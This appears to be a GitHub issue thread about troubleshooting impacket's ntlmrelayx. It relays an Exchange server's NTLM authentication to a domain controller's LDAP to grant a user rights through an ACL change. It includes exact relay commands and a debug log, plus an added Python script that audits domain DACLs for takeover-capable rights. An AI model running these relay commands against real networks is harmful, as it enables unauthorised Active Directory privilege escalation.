Closed Andrew143413 closed 3 years ago
Attacks on LDAP automatically validate which privileges the relayed user has. It only mentions "create user" privileges, not "modify domain ACL" privileges. So likely your Exchange permissions are not vulnerable. You can also skip the permission detection and always try the ACL attack with --no-validate-privs; if that fails with access denied then you know for sure you don't have the required permissions.
Thanks for the reply @dirkjanm and thank you for your great work! I was inspired by your blog posts to look more deeply into the security challenges with Active Directory.
I've also tried to run ntlmrelayx as follows:
ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-da --no-acl --escalate-user u.regular
ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --escalate-user u.regular
but got the same result - ntlmrelayx gets stuck without any error message. I don't have the output of those commands right now, but I'll recheck to ensure that I didn't miss anything.
As regards the "modify domain ACL" privilege: is there a way to check manually whether a machine or any user has it or not? I have domain admin privileges in the dc01.tdomain.xy domain.
Thanks.
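The question above (how to check by hand who holds "modify domain ACL" rights) can be answered by reading the DACL of the domain object itself: the ACL attack needs WriteDacl, WriteOwner or GenericAll on that object, granted to the relayed account or a group it belongs to. The following is an added example, not impacket's own code or anything from this thread. It parses a self-relative security descriptor in the binary form the nTSecurityDescriptor LDAP attribute returns and lists the trustees that hold one of those three rights directly on the object (inherit-only and deny ACEs are ignored). The descriptor and the SIDs below are constructed inline so the example runs offline; in a real audit you would fetch the domain object's nTSecurityDescriptor over LDAP with the SD-flags control (OID 1.2.840.113556.1.4.801) asking for the DACL only, pass the raw bytes to acl_takeover_trustees, and then resolve each returned SID and its group membership.

```python
"""List trustees able to rewrite an AD object's ACL from its binary security descriptor.

Added example (not impacket code). Parses the self-relative SECURITY_DESCRIPTOR /
ACL / ACE / SID layouts from MS-DTYP and reports SIDs granted GenericAll,
WriteDacl or WriteOwner on the object itself.
"""
import struct

# Access-mask bits that allow taking over an object's DACL (MS-DTYP / MS-ADTS).
GENERIC_ALL = 0x10000000
WRITE_DACL = 0x00040000
WRITE_OWNER = 0x00080000
# READ_CONTROL | LIST_CHILDREN | READ_PROP | LIST_OBJECT: the usual AD "read" mask.
GENERIC_READ_AD = 0x00020094

ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_ALLOWED_OBJECT_ACE_TYPE = 0x05
INHERIT_ONLY_ACE = 0x08  # ACE applies to child objects only, not to this object

RIGHT_NAMES = (("GenericAll", GENERIC_ALL), ("WriteDacl", WRITE_DACL), ("WriteOwner", WRITE_OWNER))


def parse_sid(buf, off):
    """Parse a binary SID at buf[off:]; return (sid_string, bytes_consumed)."""
    revision, sub_count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)
    sid = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return sid, 8 + 4 * sub_count


def sid_to_bytes(sid):
    """Inverse of parse_sid; used here only to build the constructed test data."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def acl_takeover_trustees(sd):
    """Return {sid: sorted right names} for trustees allowed to rewrite the DACL."""
    revision, _sbz1, _control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or dacl_off == 0:
        return {}  # no DACL present: nothing to report
    _rev, _sbz, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    pos = dacl_off + 8
    found = {}
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        body = pos + 4
        allowed = ace_type in (ACCESS_ALLOWED_ACE_TYPE, ACCESS_ALLOWED_OBJECT_ACE_TYPE)
        if allowed and not ace_flags & INHERIT_ONLY_ACE:
            (mask,) = struct.unpack_from("<I", sd, body)
            sid_off = body + 4
            if ace_type == ACCESS_ALLOWED_OBJECT_ACE_TYPE:
                # Object ACEs carry a Flags field and up to two optional GUIDs before the SID.
                (obj_flags,) = struct.unpack_from("<I", sd, sid_off)
                sid_off += 4 + (16 if obj_flags & 0x1 else 0) + (16 if obj_flags & 0x2 else 0)
            rights = [name for name, bit in RIGHT_NAMES if mask & bit]
            if rights:
                sid, _ = parse_sid(sd, sid_off)
                found.setdefault(sid, set()).update(rights)
        pos += ace_size
    return {sid: sorted(r) for sid, r in found.items()}


def build_sd(aces):
    """Assemble a DACL-only self-relative descriptor from (type, flags, mask, sid) tuples.

    Constructed test data only; real descriptors come from nTSecurityDescriptor.
    """
    ace_bytes = b""
    for ace_type, ace_flags, mask, sid in aces:
        body = struct.pack("<I", mask) + sid_to_bytes(sid)
        ace_bytes += struct.pack("<BBH", ace_type, ace_flags, 4 + len(body)) + body
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(ace_bytes), len(aces), 0) + ace_bytes
    # Control = SE_SELF_RELATIVE | SE_DACL_PRESENT; owner/group/SACL offsets left at 0.
    header = struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20)
    return header + dacl


# Constructed SIDs (hypothetical domain): a group to review, Domain Admins, an ordinary user.
EXCH_GROUP_SID = "S-1-5-21-111111111-222222222-333333333-1130"
DOMAIN_ADMINS_SID = "S-1-5-21-111111111-222222222-333333333-512"
REGULAR_USER_SID = "S-1-5-21-111111111-222222222-333333333-1105"

SAMPLE_SD = build_sd([
    (ACCESS_ALLOWED_ACE_TYPE, 0x00, GENERIC_ALL, DOMAIN_ADMINS_SID),
    (ACCESS_ALLOWED_ACE_TYPE, 0x00, GENERIC_READ_AD | WRITE_DACL, EXCH_GROUP_SID),
    (ACCESS_ALLOWED_ACE_TYPE, 0x00, GENERIC_READ_AD, REGULAR_USER_SID),
    (ACCESS_ALLOWED_ACE_TYPE, INHERIT_ONLY_ACE, GENERIC_ALL, REGULAR_USER_SID),  # children only
])

if __name__ == "__main__":
    for sid, rights in acl_takeover_trustees(SAMPLE_SD).items():
        print("%s: %s" % (sid, ", ".join(rights)))
```

Any SID reported here that is not a tier-0 group deserves a look; the fourth constructed ACE shows why inherit-only entries must be skipped, since GenericAll limited to child objects does not let its holder change the domain object's own DACL.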
The problem was indeed caused by a lack of access rights:
ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-validate-privs --escalate-user u.regular -debug
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation
[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 10.1.0.55, attacking target ldap://dc01.tdomain.xy
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against dap://dc01.tdomain.xy as TDOMAIN.XY\EXCHANGE-2016-01$ SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[+] Performing ACL attack
[+] Found sid for user U.Regular: S-1-5-21-1234567890-1234567890-1234567890-123456
[*] Querying domain security descriptor
[-] Error when updating ACL: {'dn': u'', 'referrals': None, 'description': 'insufficientAccessRights', 'result': 50, 'message': u'00000005: SecErr: DSID-03152612, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00', 'type': 'modifyResponse'}
Thanks to everyone who made such a great library for us!
Configuration
impacket version: Impacket v0.9.22.dev1+20200924.183326.65cf657f
Python version: Python 2.7.18
Python version: Python 3.8.5
Target OS: Linux rt 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux
Hello. I have the following configuration:
ntlmrelayx seems to work (ldapdomaindump successfully creates .json, .grep and .html files) in the beginning, but it is getting stuck after the message "[*] Domain info dumped into lootdir!" whatever I tried ;(
Debug Output With Command String -- Python 2.7.18
root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax
The same thing happens with Python3:
Debug Output With Command String -- Python 3.8.5
root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax
pip2 list
pip3 list
I'd appreciate any help to point me in the right direction. Thanks in advance.